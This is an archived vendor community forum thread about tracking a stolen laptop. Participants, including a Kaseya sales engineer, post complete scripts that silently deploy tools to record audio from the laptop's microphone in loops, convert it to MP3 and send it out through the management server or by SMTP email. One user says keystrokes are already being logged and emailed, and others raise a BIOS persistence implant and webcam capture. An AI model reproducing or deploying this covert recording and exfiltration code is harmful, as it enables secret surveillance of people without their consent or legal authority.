Kaseya Community

Stolen Laptop

  • I think the Police are finally ready to do something; I spoke with the detective on the case a couple of hours ago and they're pursuing a warrant in the next 24 hours. He said the amount of information I collected should speed it along, and after the warrant things will happen quickly.

    However, I'm sort of bored now: we know everything about the people that now have the laptop, the challenge is now gone, yet we still don't have it. So now I'm interested in someone's previous post about audio capture; that would also be handy!

    Anyone know of any stealth/spy command line audio capture apps?

    I like the idea of contacting the local news, mainly because it's such an interesting story!

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG
    I think the Police are finally ready to do something; I spoke with the detective on the case a couple of hours ago and they're pursuing a warrant in the next 24 hours. He said the amount of information I collected should speed it along, and after the warrant things will happen quickly.

    However, I'm sort of bored now: we know everything about the people that now have the laptop, the challenge is now gone, yet we still don't have it. So now I'm interested in someone's previous post about audio capture; that would also be handy!

    Anyone know of any stealth/spy command line audio capture apps?

    I like the idea of contacting the local news, mainly because it's such an interesting story!


    I put this together over the past few hours (the trick was finding the right combination of tools...)

    I think this is only half of the job. The really difficult part will be trying to set the built-in Microphone as the default recording device via command line. If it is not set, this script may not be of any help.

    This script will attempt to capture audio at 30 second intervals and then upload the audio to the Kaseya server in MP3 format. I'd recommend scheduling the script for every 0.5 minutes.

    Script Name: Record Audio - Windows
    Script Description: This script will deploy the tools necessary to silently record audio from a Windows-based PC and then attempt to record audio in 60 second increments and save them to the Kaseya server, linked in the 'Documents' tab for the agent.

    Benjamin Lavalley, Sr. Sales Engineer, Kaseya
    benjamin.lavalley@kaseya.com

    IF Test File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\linco.exe
    Absent :
    THEN
    Get URL
    Parameter 1 : http://downloads.sourceforge.net/project/liveincode/lineincode/2.10/linco-2.10.zip
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\linco-2.10.zip
    Parameter 3 : 3
    OS Type : 13
    Get URL
    Parameter 1 : http://www.freecodecs.net/fc/lame3.98.2.zip
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\lame3.98.2.zip
    Parameter 3 : 3
    OS Type : 13
    Write File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\unzip.exe
    Parameter 2 : VSASharedFiles\unzip.exe
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\unzip.exe" -o -q "#vAgentConfiguration.AgentTempDir#\lame3.98.2.zip" -d "#vAgentConfiguration.AgentTempDir#"
    Parameter 2 : 1
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\unzip.exe" -o -q "#vAgentConfiguration.AgentTempDir#\linco-2.10.zip" -d "#vAgentConfiguration.AgentTempDir#"
    Parameter 2 : 1
    OS Type : 13
    Schedule Script
    Parameter 1 : 35034054
    Parameter 2 :
    Parameter 3 : #vMachine.Machine_GroupID#
    OS Type : 13
    ELSE
    Close Application
    Parameter 1 : linco.exe
    OS Type : 13
    Close Application
    Parameter 1 : lame.exe
    OS Type : 13
    Execute Shell Command
    Parameter 1 : echo %random%>> "#vAgentConfiguration.AgentTempDir#\rand"
    Parameter 2 : 1
    OS Type : 13
    Get Variable
    Parameter 1 : 1
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\rand
    Parameter 3 : rand
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\linco.exe" -B 16 -C 2 -R 44100 -D 0:0:30 | "#vAgentConfiguration.AgentTempDir#\lame.exe" -V 8 -B 128 -r - "#vAgentConfiguration.AgentTempDir#\recording-#rand#.mp3"
    Parameter 2 : 1
    OS Type : 13
    Get File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\recording-#rand#.mp3
    Parameter 2 : ..\Docs\recording-#rand#.mp3
    Parameter 3 : 1
    OS Type : 13
    Delete File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\recording-#rand#.mp3
    OS Type : 13



    After searching around a while, this is the closest I have got to figuring out how to set the Microphone as the default recording device:

    http://www.autohotkey.com/docs/commands/SoundSet.htm

    Considering multiple sound devices might exist on a machine it may be difficult to figure out the right one to use. I'll try to look into this further later today...

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • Wow excellent work. I also found something that worked easily on my laptop, a command line file called cmd2wav.exe

    I ran it and it worked great as wav, haven't tried to get it to compress to mp3 before sending back to the server yet, was getting late. I'll be working on some of this today, thanks for the effort Benjamin!

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG
    Wow excellent work. I also found something that worked easily on my laptop, a command line file called cmd2wav.exe

    I ran it and it worked great as wav, haven't tried to get it to compress to mp3 before sending back to the server yet, was getting late. I'll be working on some of this today, thanks for the effort Benjamin!


    If you use the audio recording scripts and they aren't actually recording anything you'll need to change the default recording input.

    What OS is this system? XP or Vista ?

    Vista handles its mixer devices a little differently than XP -- so far I've just used the scripts below on XP.

    One script is for collecting the mixer devices; the second will make the necessary changes to the recording and playback settings (you want to be sure to have the Mic muted if you start recording from it, so as to not play it back and get a nasty echo effect...)

    Test these out before running them on the stolen laptop to be sure you know how they work:

    Script Name: Get Sound Devices - Step 1
    Script Description: This script deploys a tool to detect the mixer devices on a Windows machine.

    Analyze the output via the script log or raw file collected on the agent Documents tab and determine what device to use for recording then modify Step 2 accordingly.

    Benjamin Lavalley, Sr. Sales Engineer, Kaseya
    benjamin.lavalley@kaseya.com

    IF True
    THEN
    Get URL
    Parameter 1 : http://files.kaseya.com/sftp/volumeline.exe
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumeline.exe
    Parameter 3 : 3
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" GET:ALL >> "#vAgentConfiguration.AgentTempDir#\volumelineresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Get File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\volumelineresults.txt
    Parameter 2 : ..\Docs\volumelineresults.txt
    Parameter 3 : 1
    OS Type : 13
    Get Variable
    Parameter 1 : 1
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumelineresults.txt
    Parameter 3 : volumelineresults
    OS Type : 13
    Write Script Log Entry
    Parameter 1 : Volume Results: #volumelineresults#
    OS Type : 13
    ELSE



    Script Name: Set Recording Mixer Device & Mute Mic - Step 2
    Script Description: This script sets the volume to 100% and selects a particular device for recording based on the output gathered by the first script.
    Be sure to set the variables below accordingly.
    Identify the Mic playback device and make sure to mute that to be sure you are not playing back the microphone input.

    Benjamin Lavalley, Sr. Sales Engineer, Kaseya
    benjamin.lavalley@kaseya.com

    IF True
    THEN
    Get URL
    Parameter 1 : http://files.kaseya.com/sftp/volumeline.exe
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumeline.exe
    Parameter 3 : 3
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 1
    Parameter 3 : recordmixerdeviceid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 0
    Parameter 3 : recordmixergroupid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 2
    Parameter 3 : recordmixercontrolid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 0
    Parameter 3 : playmixerdeviceid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 0
    Parameter 3 : playmixergroupid
    OS Type : 13
    Get Variable
    Parameter 1 : 2
    Parameter 2 : 3
    Parameter 3 : playmixercontrolid
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" SET:#recordmixerdeviceid#:#recordmixergroupid#:#recordmixercontrolid# SELECT >> "#vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" SET:#recordmixerdeviceid#:#recordmixergroupid#:#recordmixercontrolid# VOLUME:100 >> "#vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Execute Shell Command
    Parameter 1 : "#vAgentConfiguration.AgentTempDir#\volumeline.exe" SET:#playmixerdeviceid#:#playmixergroupid#:#playmixercontrolid# MUTE:ON >> "#vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt"
    Parameter 2 : 1
    OS Type : 13
    Get File
    Parameter 1 : #vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt
    Parameter 2 : ..\Docs\volumelinesetresults.txt
    Parameter 3 : 1
    OS Type : 13
    Get Variable
    Parameter 1 : 1
    Parameter 2 : #vAgentConfiguration.AgentTempDir#\volumelinesetresults.txt
    Parameter 3 : volumelinesetresults
    OS Type : 13
    Write Script Log Entry
    Parameter 1 : Volume Set Results: #volumelinesetresults#
    OS Type : 13
    ELSE



    Now the trick is specifying the default recording device via another utility or script if it isn't set to the right device.

    It looks like that will best be done in the registry, and it is done on a per-user basis. I'll be working on that later if it looks like you may need it; just be sure to post the updates to the forum and let us know how things are progressing :)

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • I have had luck with my script so far on a couple laptops I've tested, without having to do anything with confirming audio sources like you were mentioning. Maybe I've just gotten lucky and will realize that I do need to figure that out, but so far this one works great.

    I have it capture audio for 10 minutes with cmd2wav.exe, convert to MP3 with lame.exe, then email using a VBS script using CDO (I don't know what that means but it's what it was called). I then have it run a copy of this script and then another copy, 6 times. I schedule the initial script once an hour and now I have a way to hear everything they say continuously (except for the few seconds it takes to compress and email). I then open the wav file using Audacity and visually look for peaks in the wave and only listen to those.

    Links:

    cmd2wav.exe
    lame.exe

    Script Name: Audio
    Script Description:

    IF Test File
    Parameter 1 : c:\kaseya\cmd2wav.exe
    Exists :
    THEN
    Execute Shell Command
    Parameter 1 : c:\kaseya\cmd2wav c:\kaseya\audio.wav 600 8 1 8000
    Parameter 2 : 1
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\lame.exe -b 16 c:\kaseya\audio.wav c:\kaseya\audio.mp3
    Parameter 2 : 0
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\audio.vbs
    Parameter 2 : 0
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.mp3
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.wav
    OS Type : 0
    Execute Script
    Parameter 1 : Audio 2 (NOTE: Script reference is NOT imported. Correct manually in script editor.)
    Parameter 2 :
    Parameter 3 : 0
    OS Type : 0
    ELSE
    Write File
    Parameter 1 : c:\kaseya\cmd2wav.exe
    Parameter 2 : VSASharedFiles\cmd2wav.exe
    OS Type : 0
    Write File
    Parameter 1 : c:\kaseya\audio.vbs
    Parameter 2 : VSASharedFiles\audio.vbs
    OS Type : 0
    Write File
    Parameter 1 : c:\kaseya\lame.exe
    Parameter 2 : VSASharedFiles\lame.exe
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\cmd2wav c:\kaseya\audio.wav 600 8 1 8000
    Parameter 2 : 1
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\lame.exe -b 16 c:\kaseya\audio.wav c:\kaseya\audio.mp3
    Parameter 2 : 1
    OS Type : 0
    Execute Shell Command
    Parameter 1 : c:\kaseya\audio.vbs
    Parameter 2 : 0
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.mp3
    OS Type : 0
    Delete File
    Parameter 1 : c:\kaseya\audio.wav
    OS Type : 0


    audio.vbs:

    Const cdoSendUsingPickup = 1 'Send message using the local SMTP service pickup directory. 
    Const cdoSendUsingPort = 2 'Send the message using the network (SMTP over the network).

    Const cdoAnonymous = 0 'Do not authenticate
    Const cdoBasic = 1 'basic (clear-text) authentication
    Const cdoNTLM = 2 'NTLM

    Set objMessage = CreateObject("CDO.Message")
    objMessage.Subject = "Audio Capture"
    objMessage.From = "(from email)"
    objMessage.To = "(to email)"
    objMessage.TextBody = "Attachment."
    objMessage.AddAttachment "c:\kaseya\audio.mp3"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "(smtp server)"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = cdoBasic
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/sendusername") = "(smtp user name)"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "(smtp password)"
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
    objMessage.Configuration.Fields.Item _
    ("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
    objMessage.Configuration.Fields.Update
    objMessage.Send


    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • Benjamin.Lavalley@kaseya.com

    What OS is this system? XP or Vista ?


    The script I made works on both

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • Glad to hear you didn't run into any issues with the recording devices -- at least the scripts are here if you need them.

    I've done a good bit with CDO in the past dealing with Exchange. Is email the best mechanism to go with for transferring the files back and forth though? Some ISPs block outbound port 25 and running a VBscript might trigger security software to block the file.

    It sounds like they must be really leaving this machine on for a long time if you'll be able to get an hour's worth of audio. I leaned more towards capturing any bits of audio I could, even if a machine was only online briefly. It does make dealing with the audio on the back-end a little more difficult when you have to recombine all the audio files, sorting by the timestamp on the file.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • It's already emailing keystrokes through the same SMTP server, so in this case I know it works, but in other cases I could just use a Get File.

    It emails the audio every 10 minutes, but since Kaseya scripts only allow you to schedule at a minimum of once an hour, I repeated the script 6 times. They have it on about 6 hours a day, so even as long as 10 minute clips that's a lot of MP3s to parse through. I don't have the file timestamped, which would be easy to do, but it's time stamped in my Outlook, so in this case it's easy enough to figure out. But a more robust and consistent script would probably be better doing the things you mentioned.

    I'll keep working on this and see where it gets me. They haven't been online since I created it so haven't actually captured their audio yet, just mine in tests

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG
    It's already emailing keystrokes through the same SMTP server, so in this case I know it works, but in other cases I could just use a Get File.

    It emails the audio every 10 minutes, but since Kaseya scripts only allow you to schedule at a minimum of once an hour, I repeated the script 6 times. They have it on about 6 hours a day, so even as long as 10 minute clips that's a lot of MP3s to parse through. I don't have the file timestamped, which would be easy to do, but it's time stamped in my Outlook, so in this case it's easy enough to figure out. But a more robust and consistent script would probably be better doing the things you mentioned.

    I'll keep working on this and see where it gets me. They haven't been online since I created it so haven't actually captured their audio yet, just mine in tests


    You can put in decimal values for how often you run a script; just do some basic division and you can run the scripts every 0.008 hours, or 30 seconds. If the machine is on for 6 hours a day it isn't necessary in this case, but at least you know you can get things to run at very short intervals in the future. The files themselves have their 'date modified' timestamp, which should be good enough to sort them out once they're received.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com
  • Excellent, didn't know that! Thanks for all your help, hopefully will have an update soon on how all this works. Of course now that I want the laptop online it isn't...

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • All we need now is a way for the Kaseya agent to survive a HD format or replacement. I see that it is now possible to embed code in the BIOS, perhaps this might work. A small BIOS code snippet that instructs the OS to re-download the kaseya agent would be all that is needed...

    http://cyberinsecure.com/new-bios-attack-might-allow-malware-survive-hard-disk-format-and-bios-reflashing/

    Mike.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: lansoft
  • Many laptops now have a built in webcam.

    Anyone got a good way to grab screen shots - or even better, stream directly from it?

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: jasonjordan
  • The laptop came online last night right before I went to bed. I ran the script but the audio came back completely blank. I was tired so just gave up for the night. But she left it on all night so I got up early and remoted on using Terminal Server since no one was using it, and no one would see me clicking around. The recording dropdown driver has nothing to choose from, so not sure what's going on with that. It could be disabled or just not working. Drivers seemed ok.

    I did confirm that the wireless networks are still the same as my iPhone scanned when I was at the location, so I know it's still in the same spot, so hopefully the warrant comes through real quick.

    There's no webcam on this laptop, but there's one on mine so can do some tests with webcam scripts on it..

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: CCG
  • CCG, I LOVE your investigation work. I have been laughing at all of the amazing things you and Ben have put together. Please keep us up to date on the happenings.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: chad.gniffke
  • jasonjordan
    Many laptops now have a built in webcam.

    Anyone got a good way to grab screen shots - or even better, stream directly from it?


    I have them for both Windows & Mac -- capturing pictures and video.

    Will post them up later.

    Legacy Forum Name: General Discussion,
    Legacy Posted By Username: Benjamin.Lavalley@kaseya.com